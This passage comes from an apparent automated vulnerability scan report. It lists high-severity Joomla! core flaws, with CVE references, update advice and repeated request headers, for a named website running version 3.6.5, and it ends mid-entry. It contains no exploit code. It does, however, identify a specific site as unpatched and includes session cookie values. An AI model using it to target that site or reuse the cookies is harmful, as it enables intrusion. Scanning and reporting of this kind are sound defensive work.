https://developer.joomla.org/security-centre/685-core-xss-vulnerability.html (https://developer.joomla.org/security-
centre/685-core-xss-vulnerability.html)

https://developer.joomla.org/security-centre/686-core-xss-vulnerability.html (https://developer.joomla.org/security-
centre/686-core-xss-vulnerability.html)

https://fortiguard.com/zeroday/FG-VD-17-107 (https://fortiguard.com/zeroday/FG-VD-17-107)

https://developer.joomla.org/security-centre/698-20170603-core-xss-vulnerability.html
(https://developer.joomla.org/security-centre/698-20170603-core-xss-vulnerability.html)

CVE-2017-7983 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7983)

CVE-2017-7985 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7985)

CVE-2017-7986 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7986)

Affected items

157
Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 1.5.0 and 3.7.2 are affected.


Request headers
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Multiple Vulnerabilities (1.5.0 - 3.8.11)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to multiple vulnerabilities, including cross-site scripting and arbitrary file upload vulnerabilities. An
attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site, allowing the attacker to steal cookie-based authentication credentials, or to upload arbitrary code and run
it in the context of the webserver process, which may facilitate unauthorized access or privilege escalation. Joomla! Core
versions ranging from 1.5.0 and up to and including 3.8.11 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.8.12 or latest

References

https://developer.joomla.org/security-centre/743-20180801-core-hardening-the-inputfilter-for-phar-stubs.html
(https://developer.joomla.org/security-centre/743-20180801-core-hardening-the-inputfilter-for-phar-stubs.html)

https://developer.joomla.org/security-centre/744-20180802-core-stored-xss-vulnerability-in-the-frontend-profile.html
(https://developer.joomla.org/security-centre/744-20180802-core-stored-xss-vulnerability-in-the-frontend-profile.html)

CVE-2018-15880 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15880)

CVE-2018-15882 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15882)

Affected items

Web Server

158
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 1.5.0 and 3.8.11 are affected.


Request headers
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Multiple Vulnerabilities (1.7.3 - 3.7.2)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to multiple vulnerabilities, including cross-site scripting and information disclosure vulnerabilities.
Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in
the context of the affected site, allowing the attacker to steal cookie-based authentication credentials, or to obtain sensitive
information that may help in launching further attacks. Joomla! Core versions ranging from 1.7.3 and up to and including
3.7.2 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.7.3 or latest

References

https://github.com/xyringe/CVE-2017-9934 (https://github.com/xyringe/CVE-2017-9934)

https://developer.joomla.org/security-centre/696-20170601-core-information-disclosure
(https://developer.joomla.org/security-centre/696-20170601-core-information-disclosure)

https://developer.joomla.org/security-centre/697-20170602-core-xss-vulnerability.html
(https://developer.joomla.org/security-centre/697-20170602-core-xss-vulnerability.html)

CVE-2017-9933 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9933)

CVE-2017-9934 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9934)

Affected items

Web Server
Details

159
Current Joomla! version: 3.6.5.

Joomla! versions between 1.7.3 and 3.7.2 are affected.


Request headers
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Multiple Vulnerabilities (2.5.0 - 3.8.12)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to multiple vulnerabilities, including security bypass and cross-site request forgery vulnerabilities.
Exploiting these issues could allow an attacker to bypass intended access restrictions and perform otherwise restricted
actions, or to perform certain administrative actions and gain unauthorized access to the affected application. Joomla! Core
versions ranging from 2.5.0 and up to and including 3.8.12 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.8.13 or latest

References

https://developer.joomla.org/security-centre/751-20181001-core-hardening-com-contact-contact-form.html
(https://developer.joomla.org/security-centre/751-20181001-core-hardening-com-contact-contact-form.html)

https://developer.joomla.org/security-centre/755-20181005-core-csrf-hardening-in-com-installer.html
(https://developer.joomla.org/security-centre/755-20181005-core-csrf-hardening-in-com-installer.html)

CVE-2018-17858 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17858)

CVE-2018-17859 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17859)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 2.5.0 and 3.8.12 are affected.

160
Request headers
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Multiple Vulnerabilities (2.5.0 - 3.9.2)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to multiple vulnerabilities, including cross-site scripting and PHP object injection vulnerabilities.
Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in
the context of the affected site, allowing the attacker to steal cookie-based authentication credentials and launch other
attacks, or to possibly execute arbitrary PHP code within the context of the affected webserver process. Joomla! Core
versions ranging from 2.5.0 and up to and including 3.9.2 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.3 or latest

References

https://developer.joomla.org/security-centre/765-20190201-core-lack-of-url-filtering-in-various-core-components.html
(https://developer.joomla.org/security-centre/765-20190201-core-lack-of-url-filtering-in-various-core-components.html)

https://developer.joomla.org/security-centre/767-20190203-core-additional-warning-in-the-global-configuration-textfilter-
settings.html (https://developer.joomla.org/security-centre/767-20190203-core-additional-warning-in-the-global-
configuration-textfilter-settings.html)

https://developer.joomla.org/security-centre/768-20190204-core-stored-xss-issue-in-the-global-configuration-help-url-2.html
(https://developer.joomla.org/security-centre/768-20190204-core-stored-xss-issue-in-the-global-configuration-help-url-
2.html)

https://developer.joomla.org/security-centre/769-20190205-core-xss-issue-in-core-js-writedynalist.html
(https://developer.joomla.org/security-centre/769-20190205-core-xss-issue-in-core-js-writedynalist.html)

https://developer.joomla.org/security-centre/770-20190206-core-implement-the-typo3-phar-stream-wrapper.html
(https://developer.joomla.org/security-centre/770-20190206-core-implement-the-typo3-phar-stream-wrapper.html)

CVE-2019-7739 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7739)

CVE-2019-7740 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7740)

161
CVE-2019-7741 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7741)

CVE-2019-7743 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7743)

CVE-2019-7744 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7744)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 2.5.0 and 3.9.2 are affected.


Request headers
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core PHP Object Injection (2.5.4 - 3.8.12)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a vulnerability that lets remote attackers inject and execute arbitrary code because the application
fails to sanitize user-supplied input before being passed to the unserialize() PHP function. Attackers can possibly exploit
this issue to execute arbitrary PHP code within the context of the affected webserver process. Joomla! Core versions
ranging from 2.5.4 and up to and including 3.8.12 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.8.13 or latest

References

https://developer.joomla.org/security-centre/752-20181002-core-inadequate-default-access-level-for-com-
joomlaupdate.html (https://developer.joomla.org/security-centre/752-20181002-core-inadequate-default-access-level-for-
com-joomlaupdate.html)

CVE-2018-17856 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17856)

Affected items

162
Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 2.5.4 and 3.8.12 are affected.


Request headers
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Security Bypass (1.5.0 - 3.8.12)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
access restrictions and perform otherwise restricted actions. Joomla! Core versions ranging from 1.5.0 and up to and
including 3.8.12 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.8.13 or latest

References

https://developer.joomla.org/security-centre/754-20181004-core-acl-violation-in-com-users-for-the-admin-verification.html
(https://developer.joomla.org/security-centre/754-20181004-core-acl-violation-in-com-users-for-the-admin-verification.html)

CVE-2018-17855 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17855)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 1.5.0 and 3.8.12 are affected.


Request headers

163
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Security Bypass (1.6.0 - 3.6.5)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to perform otherwise
restricted actions and subsequently overwrite the author of an article. Joomla! Core versions ranging from 1.6.0 and up to
and including 3.6.5 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.7.0 or latest

References

https://developer.joomla.org/security-centre/688-core-acl-violations.html (https://developer.joomla.org/security-centre/688-
core-acl-violations.html)

CVE-2017-7988 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7988)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 1.6.0 and 3.6.5 are affected.


Request headers

164
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Security Bypass (1.6.0 - 3.9.24)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
access restrictions and perform otherwise restricted actions. Joomla! Core versions ranging from 1.6.0 and up to and
including 3.9.24 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.25 or latest

References

https://developer.joomla.org/security-centre/849-20210309-core-inadequate-filtering-of-form-contents-could-allow-to-
overwrite-the-author-field.html (https://developer.joomla.org/security-centre/849-20210309-core-inadequate-filtering-of-
form-contents-could-allow-to-overwrite-the-author-field.html)

CVE-2021-26029 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26029)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 1.6.0 and 3.9.24 are affected.


Request headers

165
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Security Bypass (1.6.2 - 3.9.10)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
access restrictions and perform otherwise restricted actions. Joomla! Core versions ranging from 1.6.2 and up to and
including 3.9.10 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.11 or latest

References

https://developer.joomla.org/security-centre/789-20190801-core-hardening-com-contact-contact-form.html
(https://developer.joomla.org/security-centre/789-20190801-core-hardening-com-contact-contact-form.html)

CVE-2019-15028 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15028)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 1.6.2 and 3.9.10 are affected.


Request headers

166
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Security Bypass (1.7.0 - 3.9.22)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
access restrictions and perform otherwise restricted actions. Joomla! Core versions ranging from 1.7.0 and up to and
including 3.9.22 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.23 or latest

References

https://developer.joomla.org/security-centre/834-20201107-core-write-acl-violation-in-multiple-core-views.html
(https://developer.joomla.org/security-centre/834-20201107-core-write-acl-violation-in-multiple-core-views.html)

CVE-2020-35616 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35616)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 1.7.0 and 3.9.22 are affected.


Request headers

167
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Security Bypass (2.5.0 - 3.8.7)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to perform otherwise
restricted actions and subsequently modify the access levels of user groups with higher permissions. Joomla! Core
versions ranging from 2.5.0 and up to and including 3.8.7 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.8.8 or latest

References

https://developer.joomla.org/security-centre/729-20180501-core-acl-violation-in-access-levels.html
(https://developer.joomla.org/security-centre/729-20180501-core-acl-violation-in-access-levels.html)

CVE-2018-11323 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11323)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 2.5.0 and 3.8.7 are affected.


Request headers

168
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Security Bypass (2.5.0 - 3.9.15)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
access restrictions and perform otherwise restricted actions. Joomla! Core versions ranging from 2.5.0 and up to and
including 3.9.15 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.16 or latest

References

https://hocvahoc.me/2020/03/13/my-journey-to-find-out-joomlas-cvepart-1/ (https://hocvahoc.me/2020/03/13/my-journey-to-
find-out-joomlas-cvepart-1/)

https://github.com/HoangKien1020/Joomla-CVE/tree/master/CVE-2020-10238 (https://github.com/HoangKien1020/Joomla-
CVE/tree/master/CVE-2020-10238)

https://developer.joomla.org/security-centre/804-20200303-core-incorrect-access-control-in-com-templates.html
(https://developer.joomla.org/security-centre/804-20200303-core-incorrect-access-control-in-com-templates.html)

CVE-2020-10238 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10238)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 2.5.0 and 3.9.15 are affected.


Request headers

169
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Security Bypass (2.5.0 - 3.9.16)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
access restrictions and perform otherwise restricted actions. Joomla! Core versions ranging from 2.5.0 and up to and
including 3.9.16 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.17 or latest

References

https://github.com/HoangKien1020/CVE-2020-11890 (https://github.com/HoangKien1020/CVE-2020-11890)

https://developer.joomla.org/security-centre/810-20200402-core-missing-checks-for-the-root-usergroup-in-usergroup-
table.html (https://developer.joomla.org/security-centre/810-20200402-core-missing-checks-for-the-root-usergroup-in-
usergroup-table.html)

CVE-2020-11890 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11890)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 2.5.0 and 3.9.16 are affected.


Request headers

170
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Security Bypass (2.5.0 - 3.9.16)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
access restrictions and perform otherwise restricted actions. Joomla! Core versions ranging from 2.5.0 and up to and
including 3.9.16 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.17 or latest

References

https://developer.joomla.org/security-centre/811-20200403-core-incorrect-access-control-in-com-users-access-level-
deletion-function.html (https://developer.joomla.org/security-centre/811-20200403-core-incorrect-access-control-in-com-
users-access-level-deletion-function.html)

CVE-2020-11889 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11889)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 2.5.0 and 3.9.16 are affected.


Request headers

171
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Security Bypass (2.5.0 - 3.9.18)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
access restrictions and perform otherwise restricted actions. Joomla! Core versions ranging from 2.5.0 and up to and
including 3.9.18 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.19 or latest

References

https://developer.joomla.org/security-centre/814-20200602-core-inconsistent-default-textfilter-settings
(https://developer.joomla.org/security-centre/814-20200602-core-inconsistent-default-textfilter-settings)

CVE-2020-13763 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13763)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 2.5.0 and 3.9.18 are affected.


Request headers

172
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Security Bypass (2.5.0 - 3.9.19)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
access restrictions and perform otherwise restricted actions. Joomla! Core versions ranging from 2.5.0 and up to and
including 3.9.19 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.20 or latest

References

https://developer.joomla.org/security-centre/819-20200702-core-missing-checks-can-lead-to-a-broken-usergroups-table-
record.html (https://developer.joomla.org/security-centre/819-20200702-core-missing-checks-can-lead-to-a-broken-
usergroups-table-record.html)

CVE-2020-15699 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15699)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 2.5.0 and 3.9.19 are affected.


Request headers

173
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Security Bypass (2.5.0 - 3.9.27)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
access restrictions and perform otherwise restricted actions. Joomla! Core versions ranging from 2.5.0 and up to and
including 3.9.27 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.28 or latest

References

https://developer.joomla.org/security-centre/859-20210704-core-privilege-escalation-through-com-installer.html
(https://developer.joomla.org/security-centre/859-20210704-core-privilege-escalation-through-com-installer.html)

CVE-2021-26038 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26038)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 2.5.0 and 3.9.27 are affected.


Request headers

174
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Security Bypass (2.5.0 - 3.9.27)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to bypass intended
